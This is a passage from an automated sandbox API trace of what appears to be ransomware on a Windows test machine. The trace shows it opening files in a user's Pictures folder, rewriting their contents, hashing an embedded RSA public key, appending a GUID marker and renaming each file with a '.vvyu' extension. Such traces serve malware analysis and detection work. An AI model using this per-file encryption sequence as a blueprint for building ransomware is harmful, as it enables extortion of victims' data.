dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.604] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adfa00 | out: hHeap=0x2c0000) returned 1 [0190.604] WriteFile (in: hFile=0x584, lpBuffer=0x2af5168*, nNumberOfBytesToWrite=0x6905, lpNumberOfBytesWritten=0x2f9fb14, lpOverlapped=0x0 | out: lpBuffer=0x2af5168*, lpNumberOfBytesWritten=0x2f9fb14*=0x6905, lpOverlapped=0x0) returned 1 [0190.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af5168 | out: hHeap=0x2c0000) returned 1 [0190.605] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x690a, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.605] WriteFile (in: hFile=0x584, lpBuffer=0x2ae00c8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ae00c8*, lpNumberOfBytesWritten=0x2f9fb50*=0x100, lpOverlapped=0x0) returned 1 [0190.605] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae00c8 | out: hHeap=0x2c0000) returned 1 [0190.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x428) returned 0x2af3f88 [0190.606] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2af3f88, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0190.606] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x430) returned 0x2af43b8 [0190.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.606] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.607] WriteFile (in: hFile=0x584, lpBuffer=0x2af43b8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x2af43b8*, lpNumberOfBytesWritten=0x2f9fb50*=0x28, lpOverlapped=0x0) returned 1 [0190.607] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b8 | out: hHeap=0x2c0000) returned 1 [0190.607] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0190.607] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x2f9fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x2f9fb50*=0x26, lpOverlapped=0x0) returned 1 [0190.607] CloseHandle (hObject=0x584) returned 1 [0190.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x2a2ed40 [0190.608] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x870) returned 0x2af3f88 [0190.609] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ed40 | out: hHeap=0x2c0000) returned 1 [0190.609] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\f83rpj3sXX29oJ.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\f83rpj3sxx29oj.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\f83rpj3sXX29oJ.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\f83rpj3sxx29oj.jpg.vvyu")) returned 1 [0190.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.611] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.611] VirtualFree (lpAddress=0x2620000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0190.614] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a2ee78 | out: hHeap=0x2c0000) returned 1 [0190.614] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x36d04cc0, ftCreationTime.dwHighDateTime=0x1d8a26f, ftLastAccessTime.dwLowDateTime=0xb908eb50, ftLastAccessTime.dwHighDateTime=0x1d8a42e, ftLastWriteTime.dwLowDateTime=0xb908eb50, ftLastWriteTime.dwHighDateTime=0x1d8a42e, nFileSizeHigh=0x0, nFileSizeLow=0xd8ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gO3R.jpg", cAlternateFileName="")) returned 1 [0190.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3300 [0190.614] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5e) returned 0x2a2ee78 [0190.615] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3300 | out: hHeap=0x2c0000) returned 1 [0190.615] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\gO3R.jpg") returned=".jpg" [0190.615] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\gO3R.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\go3r.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0190.620] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x2f9fb40 | out: lpFileSize=0x2f9fb40*=55551) returned 1 [0190.620] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2620000 [0190.623] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xd8d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0190.623] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x2f9fb78, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb78*=0x26, lpOverlapped=0x0) returned 1 [0190.626] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.627] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.627] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0190.627] ReadFile (in: hFile=0x584, lpBuffer=0x2620000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x2f9fb70, lpOverlapped=0x0 | out: lpBuffer=0x2620000*, lpNumberOfBytesRead=0x2f9fb70*=0xd8ff, lpOverlapped=0x0) returned 1 [0190.628] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.628] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f1) returned 0x2a7d6f0 [0190.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.629] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0190.629] CryptAcquireContextW (in: phProv=0x2f9fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2f9fa50*=0x31b9f8) returned 1 [0190.630] CryptCreateHash (in: hProv=0x31b9f8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2f9fa58 | out: phHash=0x2f9fa58) returned 1 [0190.630] CryptHashData (hHash=0x2a05de8, pbData=0x2a7d6f0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0190.630] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x0, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x2f9fa54) returned 1 [0190.630] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x2a26b08 [0190.631] CryptGetHashParam (in: hHash=0x2a05de8, dwParam=0x2, pbData=0x2a26b08, pdwDataLen=0x2f9fa54, dwFlags=0x0 | out: pbData=0x2a26b08, pdwDataLen=0x2f9fa54) returned 1 [0190.631] GetLastError () returned 0x0 [0190.631] CryptDestroyHash (hHash=0x2a05de8) returned 1 [0190.631] CryptReleaseContext (hProv=0x31b9f8, dwFlags=0x0) returned 1 [0190.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a7d6f0 | out: hHeap=0x2c0000) returned 1 [0190.631] UuidCreate (in: Uuid=0x2f9fa48 | out: Uuid=0x2f9fa48) returned 0x0 [0190.631] UuidToStringA (in: Uuid=0x2f9fa48, StringUuid=0x2f9fa40 | out: StringUuid=0x2f9fa40) returned 0x0 [0190.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.631] RpcStringFreeA (in: String=0x2f9fa40 | out: String=0x2f9fa40) returned 0x0 [0190.631] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a425b8 | out: hHeap=0x2c0000) returned 1 [0190.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a425b8 [0190.631] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd900) returned 0x2af5168 [0190.635] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0190.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a424d8 | out: hHeap=0x2c0000) returned 1 [0190.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2adfa00 [0190.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a424d8 [0190.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1f0) returned 0x2a7d6f0 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9f30 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3300 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dce8 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2af3348 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcd0 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5eb8 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x2a06f58 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x2aebfa0 [0190.636] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x2aebfa0, Size=0x218) returned 0x2aee1c8 [0190.636] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x2af3f88 [0190.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.636] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a06f58 | out: hHeap=0x2c0000) returned 1 [0190.637] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af3f88 | out: hHeap=0x2c0000) returned 1 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7db0 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x2ae5eb8 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e50 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x2f5b18 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ba8 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x29b9ed0 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26b08 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x2a19588 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26ac8 [0190.637] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7dc0 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5eb8 | out: hHeap=0x2c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26ae8 | out: hHeap=0x2c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.638] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29b9f30 | out: hHeap=0x2c0000) returned 1 [0190.639] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2aee1c8 | out: hHeap=0x2c0000) returned 1 [0190.639] GetCurrentThreadId () returned 0x5d8 [0190.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae00c8 [0190.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x2ae50b8 [0190.639] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x2a42698 [0190.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x31b9f8 [0190.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x2ae2eb8 [0190.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e50 [0190.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae03e0 [0190.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.640] GetCurrentThreadId () returned 0x5d8 [0190.640] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x2f5b18 [0190.642] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.642] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.645] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x313fa0 [0190.645] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x313fa0 | out: hHeap=0x2c0000) returned 1 [0190.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae04e8 [0190.647] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x2a40108 [0190.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7db0 [0190.647] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2ae01d0 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ff348 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e00 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e10 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e20 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e30 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7de0 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e40 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2a0dcb8 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e00 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7da0 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e60 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e70 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x29f7e80 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5eb8 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e70 | out: hHeap=0x2c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2a26ae8 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e60 | out: hHeap=0x2c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5ed0 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e80 | out: hHeap=0x2c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5ee8 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.648] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7da0 [0190.648] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7de0 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f00 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7da0 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x2ae5f18 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f30 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2ae5f18 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f00 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x29f7e10 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7db0 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2a26aa8 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e10 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2ad7ba8 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2a0dcb8 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e00 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x204) returned 0x2af3f88 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff348 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a198d0 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f30 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x210) returned 0x2af4198 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ba8 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10c) returned 0x2f5b18 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e20 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x108) returned 0x2a197b8 [0190.649] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a0dcb8 | out: hHeap=0x2c0000) returned 1 [0190.649] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x200) returned 0x2af43b0 [0190.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a198d0 | out: hHeap=0x2c0000) returned 1 [0190.650] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x2adffc0 [0190.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e50 | out: hHeap=0x2c0000) returned 1 [0190.650] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9f8 | out: hHeap=0x2c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae04e8 | out: hHeap=0x2c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2adffc0 | out: hHeap=0x2c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a26aa8 | out: hHeap=0x2c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a197b8 | out: hHeap=0x2c0000) returned 1 [0190.651] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af4198 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2af43b0 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5b18 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x29f7e30 | out: hHeap=0x2c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ae5f18 | out: hHeap=0x2c0000) returned 1 [0190.652] 